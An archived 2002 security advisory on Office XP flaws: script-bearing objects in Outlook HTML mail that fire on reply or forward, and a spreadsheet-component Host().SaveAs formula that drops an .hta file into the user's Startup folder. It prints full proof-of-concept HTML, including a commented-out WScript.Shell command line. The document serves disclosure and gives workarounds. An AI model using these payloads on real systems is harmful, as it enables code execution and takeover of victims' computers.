TUCoPS :: Windows Apps :: win5221.htm

Office XP - bug in ms spreadsheet compononent and insertion of active component in HTML mail
2nd Apr 2002 [SBWID-5221]
COMMAND

	bug in ms spreadsheet compononent and insertion of active  component  in
	HTML mail

SYSTEMS AFFECTED

	Office XP

PROBLEM

	 Update (04 April 2002) section 3 was added

	 ======

	

	Georgi    Guninski    in    its    security    advisory    #53,     2002
	[http://www.guninski.com/m$oxp-2.html] found  following  bugs  regarding
	Office XP :
	

	

	 Legal Notice:

	

	This Advisory is Copyright (c) 2002 Georgi Guninski.

	You may distribute it unmodified.

	You may not modify it and distribute it or distribute parts

	of it without the author\'s written permission.

	If you want to link to this content use the URL:

	http://www.guninski.com/m$oxp-2.html

	

	 Disclaimer:

	

	The information in this advisory is believed to be true though

	it may be false.

	The opinions expressed in this advisory and program are my own and

	not of any company. The usual standard disclaimer applies,

	especially the fact that Georgi Guninski is not liable for any damages

	caused by direct or  indirect use of the information or functionality

	provided by this advisory or program. Georgi Guninski bears no

	responsibility for content or misuse of this advisory or program or

	any derivatives thereof.

	

	

	 Description:

	

	Actually there are at least three vulnerabilities in Office XP.
	

	1. It is possible to embed active content  (object  +  script)  in  HTML
	mail which is triggered if the user  choses  reply  or  forward  to  the
	mail. This opens an exploit scenario for forcing the  user  to  visit  a
	page in the internet zone of IE at least. For another  exploit  scenario
	check (2)
	

	2. There is a bug in ms spreadsheet compononent. Namely  in  its  Host()
	function which may be exploited with the help of (1)  or  probably  from
	any document opened with Office application. This buggy function  allows
	creating files with arbitrary names and their content may  be  specified
	to some extent at which  is  sufficient  to  place  an  executable  file
	(.hta) in user\'s startup  directory  which  may  lead  to  taking  full
	control over user\'s computer.
	

	This probably may be called  cross  application  scripting  because  one
	application uses object from another application.
	

	

	 Details:

	 

	The following must be put in HTML email  which  should  be  opened  with
	Outlook XP and the user should chose reply or forward.
	

	

	1.

	--------------------------------------

	<OBJECT id=WebBrowser1 height=150 width=300

	classid=CLSID:8856F961-340A-11D0-A96B-00C04FD705A2>

	<PARAM NAME=\"ExtentX\" VALUE=\"7938\">

	<PARAM NAME=\"ExtentY\" VALUE=\"3969\">

	<PARAM NAME=\"ViewMode\" VALUE=\"0\">

	<PARAM NAME=\"Offline\" VALUE=\"0\">

	<PARAM NAME=\"Silent\" VALUE=\"0\">

	<PARAM NAME=\"RegisterAsBrowser\" VALUE=\"1\">

	<PARAM NAME=\"RegisterAsDropTarget\" VALUE=\"1\">

	<PARAM NAME=\"AutoArrange\" VALUE=\"0\">

	<PARAM NAME=\"NoClientEdge\" VALUE=\"0\">

	<PARAM NAME=\"AlignLeft\" VALUE=\"0\">

	<PARAM NAME=\"ViewID\" VALUE=\"{0057D0E0-3573-11CF-AE69-08002B2E1262}\">

	<PARAM NAME=\"Location\" VALUE=\"about:/dev/random<script>while (42) alert(\'HOHOHO\\nTrying to sell trustworthy computing\\nHOHOHO\')</script>\">

	<PARAM NAME=\"ReadyState\" VALUE=\"4\">

	</OBJECT>

	-------------------------------------

	

	

	 2.

	The office spreadsheet component is something like mini  excel.  It  may
	be embeded in web pages (seems not exploitable) and in office  documents
	(seems exploitable). It supports the Host() function which  returns  the
	hosting object. So if you put  in  formula  \'=Host().SaveAs(\"name\")\'
	file with name shall be created.
	

	

	[Note, lines may be wrapped]

	---------------------------------------

	<h1>

	Hehe. Triyng to sell trustworthy computing.

	</h1>

	<object

	    classid=\"CLSID:0002E551-0000-0000-C000-000000000046\" id=Spreadsheet1

	    v:shapes=\"_x0000_s1026\" class=shape width=81 height=81

	    u1:shapes=\"_x0000_s1025\">

	    <param name=DataType value=XMLURL>

	    <param name=XMLData

	    value=\"<?xml version=\"1.0\"?>

	<ss:Workbook xmlns:o=\"urn:schemas-microsoft-com:office:office\"

	 xmlns:x=\"urn:schemas-microsoft-com:office:excel\"

	 

	xmlns:ss=\"urn:schemas-microsoft-com:office:spreadsheet\"

	 xmlns:c=\"urn:schemas-microsoft-com:office:component:spreadsheet\"

	 xmlns:html=\"http://www.w3.org/TR/REC-html40\">

	 

	<x:ExcelWorkbook>

	  <x:ProtectStructure>False</x:ProtectStructure>

	  <x:ActiveSheet>0</x:ActiveSheet>

	 </x:ExcelWorkbook>

	 <ss:Styles>

	  <ss:Style 

	ss:ID=\"Default\">

	   <ss:Alignment ss:Horizontal=\"Automatic\" ss:Rotate=\"0.0\" ss:Vertical=\"Bottom\"

	    ss:ReadingOrder=\"Context\"/>

	 

	<ss:Borders>

	   </ss:Borders>

	   <ss:Font ss:FontName=\"Arial\" ss:Size=\"10\" ss:Color=\"Automatic\" ss:Bold=\"0\"

	    ss:Italic=\"0\" 

	ss:Underline=\"None\"/>

	   <ss:Interior ss:Color=\"Automatic\" ss:Pattern=\"None\"/>

	   <ss:NumberFormat ss:Format=\"General\"/>

	   <ss:Protection 

	ss:Protected=\"1\"/>

	  </ss:Style>

	 </ss:Styles>

	 <c:ComponentOptions>

	  <c:Label>

	   <c:Caption>Microsoft Office Spreadsheet</c:Caption>

	 

	  </c:Label>

	  <c:PreventPropBrowser/>

	  <c:MaxHeight>80%</c:MaxHeight>

	  <c:MaxWidth>80%</c:MaxWidth>

	  <c:NextSheetNumber>1</c:NextSheetNumber>

	 

	</c:ComponentOptions>

	 <x:WorkbookOptions>

	  <c:OWCVersion>10.0.0.2621         </c:OWCVersion>

	  <x:DisableUndo/>

	 </x:WorkbookOptions>

	 <ss:Worksheet 

	ss:Name=\"Sheet1\">

	  <x:WorksheetOptions>

	   <x:Selected/>

	   <x:ViewableRange>R1:R262144</x:ViewableRange>

	   <x:Selection>R1C1</x:Selection>

	 

	<x:TopRowVisible>0</x:TopRowVisible>

	   <x:LeftColumnVisible>0</x:LeftColumnVisible>

	   <x:ProtectContents>False</x:ProtectContents>

	  </x:WorksheetOptions>

	 

	<c:WorksheetOptions>

	  </c:WorksheetOptions>

	  <ss:Table ss:ExpandedColumnCount=\"1\" ss:ExpandedRowCount=\"1\"

	   ss:DefaultColumnWidth=\"48.0\" 

	ss:DefaultRowHeight=\"12.75\">

	   <ss:Row>

	    <ss:Cell ss:Formula=\'=HOST().SaveAs(\"C:\\GGGG5\")\'>

	     <ss:Data ss:Type=\"Boolean\">1</ss:Data>

	 

	</ss:Cell>

	   </ss:Row>

	  </ss:Table>

	 </ss:Worksheet>

	 <ss:Worksheet ss:Name=\"Sheet2\">

	  <x:WorksheetOptions>

	 

	<x:ViewableRange>R1:R262144</x:ViewableRange>

	   <x:Selection>R1C1</x:Selection>

	   <x:TopRowVisible>0</x:TopRowVisible>

	 

	<x:LeftColumnVisible>0</x:LeftColumnVisible>

	   <x:ProtectContents>False</x:ProtectContents>

	  </x:WorksheetOptions>

	  <c:WorksheetOptions>

	 

	</c:WorksheetOptions>

	 </ss:Worksheet>

	 <ss:Worksheet ss:Name=\"Sheet3\">

	  <x:WorksheetOptions>

	   <x:ViewableRange>R1:R262144</x:ViewableRange>

	 

	<x:Selection>R1C1</x:Selection>

	   <x:TopRowVisible>0</x:TopRowVisible>

	   <x:LeftColumnVisible>0</x:LeftColumnVisible>

	 

	<x:ProtectContents>False</x:ProtectContents>

	  </x:WorksheetOptions>

	  <c:WorksheetOptions>

	  </c:WorksheetOptions>

	 </ss:Worksheet>

	 

	<o:DocumentProperties>

	   <o:Author>ad</o:Author>

	   <o:LastAuthor>ad</o:LastAuthor>

	   <o:Created>2002-03-17T12:07:37Z</o:Created>

	 

	<o:Company>g</o:Company>

	   <o:Version>10.2625</o:Version>

	  </o:DocumentProperties>

	  <o:OfficeDocumentSettings>

	   <o:DownloadComponents/>

	 

	<o:LocationOfComponents HRef=\"file:///E:\\\"/>

	  </o:OfficeDocumentSettings>

	</ss:Workbook>

	\">

	    <param name=AllowPropertyToolbox value=0>

	    <param name=AutoFit value=0>

	    <param name=Calculation value=-4105>

	    <param name=Caption value=\"Microsoft Office Spreadsheet\">

	    <param name=DisplayColumnHeadings value=-1>

	    <param name=DisplayGridlines value=-1>

	    <param name=DisplayHorizontalScrollBar value=-1>

	    <param name=DisplayOfficeLogo value=-1>

	    <param name=DisplayPropertyToolbox value=0>

	    <param name=DisplayRowHeadings value=-1>

	    <param name=DisplayTitleBar value=0>

	    <param name=DisplayToolbar value=-1>

	    <param name=DisplayVerticalScrollBar value=-1>

	    <param name=DisplayWorkbookTabs value=-1>

	    <param name=EnableEvents value=-1>

	    <param name=MaxHeight value=\"80%\">

	    <param name=MaxWidth value=\"80%\">

	    <param name=MoveAfterReturn value=-1>

	    <param name=MoveAfterReturnDirection value=-4121>

	    <param name=RightToLeft value=0>

	    <param name=ScreenUpdating value=-1>

	    <param name=EnableUndo value=0>

	   </object>

	---------------------------------

	

	

	3. The following must be put in HTML email which should be  opened  with
	Outlook XP and the user should chose reply or forward. Probably  it  may
	also be embeded in .doc or .xls file. The  effect  is  shown  after  the
	user logouts and logins again.
	

	----------------------------------------

	<h1>

	Hehe. Trying to sell trustworthy computing.

	</h1>

	

	<object

	    classid=\"CLSID:0002E551-0000-0000-C000-000000000046\" id=Spreadsheet1

	    v:shapes=\"_x0000_s1026\" class=shape width=81 height=81

	    u1:shapes=\"_x0000_s1025\">

	    <param name=DataType value=XMLURL>

	    <param name=XMLData

	    value=\"<?xml version=\"1.0\"?>

	<ss:Workbook xmlns:o=\"urn:schemas-microsoft-com:office:office\"

	 xmlns:x=\"urn:schemas-microsoft-com:office:excel\"

	 

	xmlns:ss=\"urn:schemas-microsoft-com:office:spreadsheet\"

	 xmlns:c=\"urn:schemas-microsoft-com:office:component:spreadsheet\"

	 xmlns:html=\"http://www.w3.org/TR/REC-html40\">

	 

	<x:ExcelWorkbook>

	  <x:ProtectStructure>False</x:ProtectStructure>

	  <x:ActiveSheet>0</x:ActiveSheet>

	 </x:ExcelWorkbook>

	 <ss:Styles>

	  <ss:Style 

	ss:ID=\"Default\">

	   <ss:Alignment ss:Horizontal=\"Automatic\" ss:Rotate=\"0.0\" ss:Vertical=\"Bottom\"

	    ss:ReadingOrder=\"Context\"/>

	 

	<ss:Borders>

	   </ss:Borders>

	   <ss:Font ss:FontName=\"Arial\" ss:Size=\"10\" ss:Color=\"Automatic\" ss:Bold=\"0\"

	    ss:Italic=\"0\" 

	ss:Underline=\"None\"/>

	   <ss:Interior ss:Color=\"Automatic\" ss:Pattern=\"None\"/>

	   <ss:NumberFormat ss:Format=\"General\"/>

	   <ss:Protection 

	ss:Protected=\"1\"/>

	  </ss:Style>

	 </ss:Styles>

	 <c:ComponentOptions>

	  <c:Label>

	   <c:Caption>Microsoft Office Spreadsheet</c:Caption>

	 

	  </c:Label>

	  <c:PreventPropBrowser/>

	  <c:MaxHeight>80%</c:MaxHeight>

	  <c:MaxWidth>80%</c:MaxWidth>

	  <c:NextSheetNumber>1</c:NextSheetNumber>

	 

	</c:ComponentOptions>

	 <x:WorkbookOptions>

	  <c:OWCVersion>10.0.0.2621         </c:OWCVersion>

	  <x:DisableUndo/>

	 </x:WorkbookOptions>

	 <ss:Worksheet 

	ss:Name=\"Sheet1\">

	  <x:WorksheetOptions>

	   <x:Selected/>

	   <x:ViewableRange>R1:R262144</x:ViewableRange>

	   <x:Selection>R1C1</x:Selection>

	 

	<x:TopRowVisible>0</x:TopRowVisible>

	   <x:LeftColumnVisible>0</x:LeftColumnVisible>

	   <x:ProtectContents>False</x:ProtectContents>

	  </x:WorksheetOptions>

	 

	<c:WorksheetOptions>

	  </c:WorksheetOptions>

	  <ss:Table ss:ExpandedColumnCount=\"1\" ss:ExpandedRowCount=\"1\"

	   ss:DefaultColumnWidth=\"48.0\" 

	ss:DefaultRowHeight=\"12.75\">

	   <ss:Row>

	    <ss:Cell ss:Formula=\'=HOST().SaveAs(\"../Start Menu/Programs/StartUp/gggg5.hta\",8)\'>

	     <ss:Data 

	ss:Type=\"Boolean\">1</ss:Data>

	    </ss:Cell>

	   </ss:Row>

	  </ss:Table>

	 </ss:Worksheet>

	 <ss:Worksheet ss:Name=\"Sheet2\">

	 

	<x:WorksheetOptions>

	   <x:ViewableRange>R1:R262144</x:ViewableRange>

	   <x:Selection>R1C1</x:Selection>

	   <x:TopRowVisible>0</x:TopRowVisible>

	 

	<x:LeftColumnVisible>0</x:LeftColumnVisible>

	   <x:ProtectContents>False</x:ProtectContents>

	  </x:WorksheetOptions>

	  <c:WorksheetOptions>

	 

	</c:WorksheetOptions>

	 </ss:Worksheet>

	 <ss:Worksheet ss:Name=\"Sheet3\">

	  <x:WorksheetOptions>

	   <x:ViewableRange>R1:R262144</x:ViewableRange>

	 

	<x:Selection>R1C1</x:Selection>

	   <x:TopRowVisible>0</x:TopRowVisible>

	   <x:LeftColumnVisible>0</x:LeftColumnVisible>

	 

	<x:ProtectContents>False</x:ProtectContents>

	  </x:WorksheetOptions>

	  <c:WorksheetOptions>

	  </c:WorksheetOptions>

	 </ss:Worksheet>

	 

	<o:DocumentProperties>

	   <o:Author>ad</o:Author>

	   <o:LastAuthor>ad</o:LastAuthor>

	   <o:Created>2002-03-17T12:07:37Z</o:Created>

	 

	<o:Company>g</o:Company>

	   <o:Version>10.2625</o:Version>

	  </o:DocumentProperties>

	  <o:OfficeDocumentSettings>

	   <o:DownloadComponents/>

	 

	<o:LocationOfComponents HRef=\"file:///E:\\\"/>

	  </o:OfficeDocumentSettings>

	</ss:Workbook>

	\">

	    <param name=AllowPropertyToolbox value=0>

	    <param name=AutoFit value=0>

	    <param name=Calculation value=-4105>

	    <param name=Caption value=\"Microsoft Office Spreadsheet\">

	    <param name=DisplayColumnHeadings value=-1>

	    <param name=DisplayGridlines value=-1>

	    <param name=DisplayHorizontalScrollBar value=-1>

	    <param name=DisplayOfficeLogo value=-1>

	    <param name=DisplayPropertyToolbox value=0>

	    <param name=DisplayRowHeadings value=-1>

	    <param name=DisplayTitleBar value=0>

	    <param name=DisplayToolbar value=-1>

	    <param name=DisplayVerticalScrollBar value=-1>

	    <param name=DisplayWorkbookTabs value=-1>

	    <param name=EnableEvents value=-1>

	    <param name=MaxHeight value=\"80%\">

	    <param name=MaxWidth value=\"80%\">

	    <param name=MoveAfterReturn value=-1>

	    <param name=MoveAfterReturnDirection value=-4121>

	    <param name=RightToLeft value=0>

	    <param name=ScreenUpdating value=-1>

	    <param name=EnableUndo value=0>

	   </object>

	<script>

	i=3;

	while (i--) confirm(\"Trustworthy?\");

	//x=new ActiveXObject(\"WScript.Shell\");

	//x.Run(\"C:\\\\WINNT\\\\SYSTEM32\\\\CMD.EXE /C DIR C:\\\\ /a /p /s\");

	</script>

	------------------------------------------

	

SOLUTION

	Workaround/Solution: The solution is to  get  a  real  mail  client  and
	office applications. Workaround for this particular problem is: For  (1)
	- disable everything that contains \"active\" in IE.  For  (2)  -  (Have
	not  tested  it  personally)  Deregister  and  delete  the   ms   office
	spreadsheet component
	

	 Vendor status:

	

	Microsoft was notified on 17 March 2002. They had 2 weeks to  produce  a
	patch but didn\'t.
	

	

	Regards,

	Georgi Guninski

	http://www.guninski.com

	

	

	 Update (04 April 2002)

	 ======

	

	Ben Schorr adds :
	

	To work-around this problem in Outlook go to  Tools  |  Options  |  Mail
	Format and uncheck the boxes for \"Use  Word  to...\"  That  will  cause
	Outlook to use it\'s own native editor for such  things  and  shuts  the
	window on this exploit.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH